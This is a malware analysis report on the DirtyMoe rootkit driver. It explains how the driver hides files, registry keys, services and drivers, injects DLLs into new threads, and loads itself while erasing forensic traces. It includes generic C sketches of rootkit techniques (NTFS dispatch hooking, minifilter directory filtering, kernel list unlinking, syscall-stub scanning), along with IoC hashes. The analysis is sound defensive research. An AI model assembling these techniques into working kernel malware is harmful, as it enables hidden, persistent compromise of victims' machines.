(Shutdown)
regKey1_shutdown
regValue1_shutdown
regData1_shutdown
regType1
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown
regValue2_shutdown
regData2_shutdown
regType2
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
regValue
regType
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Unknow
(unused)
dwWinDevicePathA
dwWinDeviceDataA
Keeps a path and data for file A.
dwWinDevicePathB
dwWinDeviceDataB
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
dwWinDriverMaker2_2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1
dwWinDriverMaker1_2
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
dwWinDriverDataA
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2
dwWinDriverDataA_2
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2
dwWinDriverDataB
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2
dwWinDriverDataB_2
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if the requesting process is not present in the whitelists. There are two whitelists. The first ones (Process ID and File names) ensure that the QueryDirectory results are not modified if the process ID or the process image file name requesting the given I/O operation (QueryDirectory) is present in the whitelists. They represent malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber and defines a set of suffixes. The FltPostOperation() iterates over each item of the QueryDirectory result. If an enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. This ensures that the whitelisted files are not visible to non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file from user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g., Ke145057.xsl, since the suffix is a number; see Appendix B.
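
For reference, the registration pattern the driver uses looks, in a stripped-down generic form, like the sketch below (this is not DirtyMoe's code; names are generic and all uninteresting callbacks are left NULL). QueryDirectory requests arrive as IRP_MJ_DIRECTORY_CONTROL with the IRP_MN_QUERY_DIRECTORY minor function:

#include <fltKernel.h>

FLT_POSTOP_CALLBACK_STATUS
PostDirCtrlCallback(PFLT_CALLBACK_DATA Data, PCFLT_RELATED_OBJECTS FltObjects,
                    PVOID CompletionContext, FLT_POST_OPERATION_FLAGS Flags)
{
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    UNREFERENCED_PARAMETER(Flags);
    // A rootkit would walk the returned FILE_*_DIRECTORY_INFORMATION entries found via
    // Data->Iopb->Parameters.DirectoryControl.QueryDirectory and unlink the ones to hide.
    UNREFERENCED_PARAMETER(Data);
    return FLT_POSTOP_FINISHED_PROCESSING;
}

static const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_DIRECTORY_CONTROL, 0, NULL, PostDirCtrlCallback },
    { IRP_MJ_OPERATION_END }
};

static const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION),      // Size
    FLT_REGISTRATION_VERSION,      // Version
    0,                             // Flags
    NULL,                          // ContextRegistration
    Callbacks,                     // OperationRegistration
    NULL,                          // FilterUnloadCallback (remaining callbacks left NULL)
};

// In DriverEntry: FltRegisterFilter(DriverObject, &FilterRegistration, &gFilterHandle);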

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process IDs, and allowed files. If the process requesting disk access is whitelisted, then the requested file must also be on the whitelist. It is double protection. The blacklist is focused on process image names. Therefore, blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.
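
The classic way to perform such a swap (shown here as a generic sketch, not DirtyMoe's exact code) is to look up the \FileSystem\Ntfs driver object and exchange the major-function pointer. ObReferenceObjectByName and IoDriverObjectType are undocumented and have to be declared manually; the prototypes below are the commonly used ones, and MalNtfsCreatCallback stands for the malicious handler mentioned above:

extern POBJECT_TYPE *IoDriverObjectType;
NTSTATUS ObReferenceObjectByName(PUNICODE_STRING ObjectName, ULONG Attributes,
                                 PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess,
                                 POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode,
                                 PVOID ParseContext, PVOID *Object);

static PDRIVER_DISPATCH OriginalNtfsCreate;

VOID HookNtfsCreate(VOID)
{
    UNICODE_STRING ntfsName = RTL_CONSTANT_STRING(L"\\FileSystem\\Ntfs");
    PDRIVER_OBJECT ntfsDriver = NULL;

    if (NT_SUCCESS(ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0,
                                           *IoDriverObjectType, KernelMode, NULL,
                                           (PVOID *)&ntfsDriver)))
    {
        // Save the original handler and atomically install the malicious one.
        OriginalNtfsCreate = ntfsDriver->MajorFunction[IRP_MJ_CREATE];
        InterlockedExchangePointer((PVOID volatile *)&ntfsDriver->MajorFunction[IRP_MJ_CREATE],
                                   (PVOID)MalNtfsCreatCallback);
        ObDereferenceObject(ntfsDriver);
    }
}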

2.6 Registry Hiding

The driver can hide a given registry key. Every manipulation of a registry key goes through the kernel method GetCellRoutine(), which the driver hooks. The configuration manager assigns a control block to each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() method computes the memory address of a requested key. Therefore, if the malware driver takes control over GetCellRoutine(), it can filter which registry keys will be visible; more precisely, which keys can be looked up in the hash table.

The malware driver finds the address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses a well-documented implementation [3, 4]. It goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for the CM_KEY_CONTROL_BLOCK and its associated HHIVE structure corresponding to the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

The pitfall of this method is that the offsets of the sought structures, variables, and methods are specific to each Windows version or build. So, the driver must determine which Windows version it is running on.

The MalGetCellRoutine() hook method performs 3 basic operations as follows:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
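
In rough pseudo-C, the hook's decision logic therefore looks something like the sketch below. The GetCellRoutine prototype and the helper names here are simplifications based on the public write-ups the driver reuses, not the actual DirtyMoe code:

PVOID MalGetCellRoutine(PVOID Hive, ULONG CellIndex)
{
    // 1. Ask the original routine for the cell data.
    PVOID cellData = OriginalGetCellRoutine(Hive, CellIndex);

    // 2. Whitelisted processes (services.exe, System, whitelisted image names) see everything.
    if (IsProcessWhitelisted(PsGetCurrentProcessId()))
        return cellData;

    // 3. If the resolved key is on the hide list, pretend the enumeration reached its end.
    if (cellData != NULL && IsKeyOnHideList(cellData))
        return GetLastKeyOfHive(Hive);   // or NULL once the last key has already been returned

    return cellData;
}
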
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across the whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the iteration reaches the end of the HIVE, the driver does not return the last key, since it was returned before, but just returns NULL, which ends the HIVE search.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

The decision-making mechanism is more complicated on Windows 10. The driver hides the requested key only for the regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into newly created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Driver Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and a Create flag. The driver affects only threads whose Create flag is set to TRUE, i.e., only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segment from the address of ZwAllocateVirtualMemory() and looks for instructions representing a constant move to eax (e.g., mov eax, ??h). This identifies the VirtualMemory methods; see Table 7 for the constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constant is found, the final address of the looked-up method is calculated as follows:

method_address = constant_address - alignment_constant;
where the alignment_constant helps to point to the start of the looked-up method.

The steps to find the methods can be summarized as follows:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method  is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods
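
Since the figure is not reproduced here, the scan can be approximated by the sketch below. It assumes the stubs encode the constant as mov eax, imm32 (opcode 0xB8); the scan length and the helper name are mine, not the malware's:

static PVOID FindRoutineByConstant(PUCHAR zwAllocateVirtualMemory,
                                   ULONG constant, SIZE_T alignmentConstant)
{
    // Walk forward from ZwAllocateVirtualMemory looking for "mov eax, <constant>".
    for (PUCHAR p = zwAllocateVirtualMemory; p < zwAllocateVirtualMemory + 0x2000; p++)
    {
        if (p[0] == 0xB8 && *(ULONG UNALIGNED *)(p + 1) == constant)
        {
            // method_address = constant_address - alignment_constant
            return (PVOID)(p - alignmentConstant);
        }
    }
    return NULL;
}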

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread's APC queue. An APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread; the queue is checked periodically. The driver rewrites the instructions of NtTestAlert() so that it jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step of the process injection is to find free memory for a code cave. The driver finds free memory near the NtTestAlert() routine address. The code cave includes a shellcode, as Figure 6 demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (the code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends with a return instruction, so the original NtTestAlert() is invoked afterwards. Finally, rdx contains the jump address where the driver injected the malicious code. The next item of the code cave is the path to the DLL file, which will be loaded into the injected process. The remaining items of the code cave are the original address and the original code instructions of NtTestAlert().

The driver writes the malicious code to the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are overwritten with an instruction that simply jumps to the shellcode. As a result, when NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find the 32-bit variant of the LdrLoadDll() method. It uses a technique similar to the one described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the services.exe process and attach to it via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. services.exe keeps all running services as a linked list of SERVICE_RECORD structures [5]. The malware driver iterates this list and unlinks the required services defined by the listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using the PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via the Windows Event Log. Therefore, we can enumerate all regular services and all logged services, and then diff the two lists to find the hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on an IOCTL from the user-mode. The Driver Entry receives a parameter representing the driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called the driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to an LDR_DATA_TABLE_ENTRY that is part of a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].
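
Unlinking an entry from this list is the textbook DKOM trick; a minimal sketch of the idea follows (the LDR_DATA_TABLE_ENTRY layout is undocumented, so only the one field used here is declared, and offsets differ across builds):

typedef struct _LDR_DATA_TABLE_ENTRY_PARTIAL {
    LIST_ENTRY InLoadOrderLinks;
    // ... DllBase, EntryPoint, BaseDllName, and the rest are omitted.
} LDR_DATA_TABLE_ENTRY_PARTIAL, *PLDR_DATA_TABLE_ENTRY_PARTIAL;

VOID HideDriver(PDRIVER_OBJECT DriverObject)
{
    PLDR_DATA_TABLE_ENTRY_PARTIAL entry =
        (PLDR_DATA_TABLE_ENTRY_PARTIAL)DriverObject->DriverSection;

    // Unlink the entry so the kernel can no longer reach it while enumerating drivers.
    RemoveEntryList(&entry->InLoadOrderLinks);

    // Point the orphaned entry at itself so a later walk starting from it does not crash.
    InitializeListHead(&entry->InLoadOrderLinks);
}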

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. The driver image is not permanently stored on disk since the service always extracts, loads, and deletes the driver image on service startup. The secondary aim of the service is to eliminate evidence of the driver loading and thereby complicate forensic analysis. The service strives to camouflage its registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, as the common Windows naming convention would suggest. Moreover, an ImagePath prefixed with the dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during a Windows crash. The malware tries to use the virtual driver naming convention so as not to be conspicuous. The principle of dumping memory using the virtual drivers is described in [7, 8].

ImagePath values differ with each Windows reboot, but they always abuse the name of a native system driver; see a few instances collected during Windows boots: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().
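
In native-API terms this step boils down to something like the following sketch (the service runs in user mode, where the same call is exported by ntdll as NtLoadDriver/ZwLoadDriver; SeLoadDriverPrivilege is required):

UNICODE_STRING driverServiceKey;
RtlInitUnicodeString(&driverServiceKey,
    L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\services\\dump_E3947328");

// The argument is the full registry path of the service key prepared in section 3.1.
NTSTATUS status = ZwLoadDriver(&driverServiceKey);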

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via an API call. Therefore, a forensic trace can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes the relevant HIVE pointer, but the unreferenced data is still present in the HIVE stored on the disk. Hence, we can read the removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing the driver image and registry keys

The malware service is responsible for loading the driver and for cleaning up the loading evidence. We put a breakpoint on the nt!IopLoadDriver() kernel method, which is hit whenever a process wants to load a driver into the system. We waited for the driver of interest and then listed all the system processes. The corresponding service (svchost.exe) had a call stack containing the kernel call for driver loading, so we killed it by modifying its EIP register. The process (service) was killed and Windows ended in a BSoD. Windows produced a crash dump, so the file system caches were flushed and the malicious service did not manage to finish its cleanup in time. Therefore, we were able to mount the volume and read all the data we wanted.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and the loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can obtain additional information such as the ProcessID and ThreadID of all services, including the hidden ones.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with the dump_ prefix and thus identify the malicious drivers.

An offline-mounted volume can provide the service DLLs and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers be code-signed. The digital code signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates that sign a driver. So, if one of the certificates in the chain is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates, since this topic is quite broad; backward compatibility as well as potential impact on the kernel implementation both play a role.

DirtyMoe drivers are signed with three certificates as follows:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-2011 (10:42:04)

The certificates have been revoked by their certification authorities and are registered as stolen, leaked, misused, etc. [10]. Although all of the certificates were revoked in the past, Windows still loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

Below, we summarize the main functionality of the DirtyMoe driver and discuss the quality of the driver implementation, its anti-forensic mechanisms, and the stolen certificates used for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes sent by malware processes in user mode. However, the driver implements an authorization mechanism that verifies that the IOCTLs are sent by authenticated processes. Therefore, not every process can communicate with the driver.
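
To make the idea concrete, a generic IOCTL gate could look like the sketch below. This is not DirtyMoe's actual dispatch routine: the IOCTL code, the secret value, and the single global flag (the real driver tracks which processes authenticated) are all made-up placeholders.

#include <ntddk.h>

#define IOCTL_AUTHORIZE \
  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define AUTH_SECRET 0xDEADBEEF  // hypothetical hardcoded value

static BOOLEAN g_CallerAuthorized = FALSE;

NTSTATUS DeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
  UNREFERENCED_PARAMETER(DeviceObject);
  const PIO_STACK_LOCATION Stack = IoGetCurrentIrpStackLocation(Irp);
  const ULONG Ioctl = Stack->Parameters.DeviceIoControl.IoControlCode;
  const ULONG InLen = Stack->Parameters.DeviceIoControl.InputBufferLength;
  NTSTATUS Status = STATUS_ACCESS_DENIED;

  if (Ioctl == IOCTL_AUTHORIZE && InLen >= sizeof(ULONG)) {

    //
    // The caller proves itself by sending the hardcoded secret; only then
    // are the privileged IOCTLs (hiding, injection, ...) served.
    //

    const ULONG *In = (ULONG *)Irp->AssociatedIrp.SystemBuffer;
    if (*In == AUTH_SECRET) {
      g_CallerAuthorized = TRUE;
      Status = STATUS_SUCCESS;
    }
  } else if (g_CallerAuthorized) {

    //
    // Dispatch the privileged functionality here.
    //

    Status = STATUS_SUCCESS;
  }

  Irp->IoStatus.Status = Status;
  Irp->IoStatus.Information = 0;
  IoCompleteRequest(Irp, IO_NO_INCREMENT);
  return Status;
}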

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in effect, it filters the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so it can decide who should gain access to the filesystem and what should not get into it.

Thread Monitoring and Code injection

The DirtyMoe driver registers a malicious routine that is invoked whenever the system creates a new thread. The malicious routine abuses the kernel APC mechanism to execute malicious code: it loads an arbitrary DLL into the new thread.
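
A minimal sketch of the hook point is shown below; it is not DirtyMoe's code. Only the documented thread-creation callback registration is shown, and the APC queueing itself, which relies on the undocumented KeInitializeApc/KeInsertQueueApc routines, is indicated only by a comment:

#include <ntddk.h>

VOID ThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create) {
  UNREFERENCED_PARAMETER(ProcessId);
  UNREFERENCED_PARAMETER(ThreadId);

  if (!Create) {
    return;
  }

  //
  // At this point the driver decides whether the process is of interest and,
  // if so, initializes and queues a user-mode APC (KeInitializeApc /
  // KeInsertQueueApc) whose normal routine loads the attacker's DLL once the
  // new thread starts executing in user mode.
  //
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
  UNREFERENCED_PARAMETER(DriverObject);
  UNREFERENCED_PARAMETER(RegistryPath);
  return PsSetCreateThreadNotifyRoutine(ThreadNotify);
}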

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in the hive. The code execution of the hook method is redirected to a malicious routine, so the driver can control the indexing of registry keys. In effect, the driver can select which keys are indexed and which are not.

Service and Driver Hiding

Patching specific kernel structures causes certain API functions not to enumerate all system services or loaded drivers. Windows services and drivers are stored as doubly-linked lists in the kernel. The driver corrupts these kernel structures so that the malicious services and drivers are unlinked from them. Consequently, when the kernel iterates over these structures for enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before the driver is loaded, the DirtyMoe service must register it in the registry and dump it into a file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading, and the driver deletes its own file from the file system from kernel mode. Therefore, the driver is loaded in memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from physical storage, since the API calls only remove the pointer from the hive. The dumped driver file, however, is never physically written to the disk because it is small enough to stay in the file system cache. The file is removed from the cache before the cache is flushed to disk, so we cannot restore it from the physical drive.

5.3 Discussion

The whole driver serves as an all-in-one super-rootkit package. Any malware can register itself with the driver if it knows the authorization code. After successful registration, the malware can use a wide range of the driver's functionality. Since the authorization code is hardcoded and the driver's name can be derived, we can hypothetically communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never physically present in the file system, only in the cache. The driver is loaded via an API call, and the DirtyMoe service keeps a handle to the driver file, so manipulation of the file is limited. However, the driver removes its own file using a kernel call. As a result, the driver file is removed from the file system cache; the handle remains valid, but the file itself, including its forensic traces, no longer exists.

The DirtyMoe malware is mostly written in Delphi; the driver, naturally, is coded in native C. The code style of the driver and of the rest of the malware is very different. Our analysis indicates that most of the driver's functionality was taken from public samples posted on internet forums. Each part of the driver is also written in a different style. The malware authors merged individual rootkit functions into one kit, and they merged the known bugs along with them, so the driver shows a few significant symptoms of its presence in the system. The authors had to adapt the public samples to their purpose, but this was done in a rather amateurish way. It seems that the malware authors are only comfortable with Delphi.

Finally, the code-signing certificates in use were revoked in the middle of their validity periods. Nevertheless, they are still widely used for code signing, so their private keys have probably been stolen or leaked. In addition, the stolen certificates were issued by certification authorities that Microsoft trusts, so drivers signed this way can be loaded into the system despite the revocation. Moreover, the trend in the abuse of such certificates is growing, and predictions show that it will continue to grow. We will analyze the problems of code-signing certificates in a future post.

6. Conclusion

The DirtyMoe driver is an advanced rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionality of the DirtyMoe driver and to evaluate its impact on infected systems. This study set out to investigate and present an analysis of the DirtyMoe driver, namely its functionality, its ability to conceal itself, its deployment, and its code signature.

The research has shown that the driver provides key functionality for hiding malicious processes, services, and registry keys. Another dangerous capability of the driver is the injection of malicious code into newly created processes. Moreover, the driver implements a minifilter that monitors and affects I/O operations on the file system; the content of the file system is thus filtered, and selected files/directories can be hidden from users. An implication of this finding is that the malware itself and its artifacts are hidden even from AV software. More importantly, the driver implements an additional anti-forensic technique that removes the driver's evidence from disk and registry immediately after driver loading. Still, a few traces can be found on the victim's machine.

This study has provided the first comprehensive review of the driver that protects and serves each service and process of the DirtyMoe malware. The scope of this study was limited to the driver's functionality. However, further experimental investigation is needed to hunt down and examine other samples signed with the revoked certificates; the abused certificates might then be used to trace and identify the malware authors.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
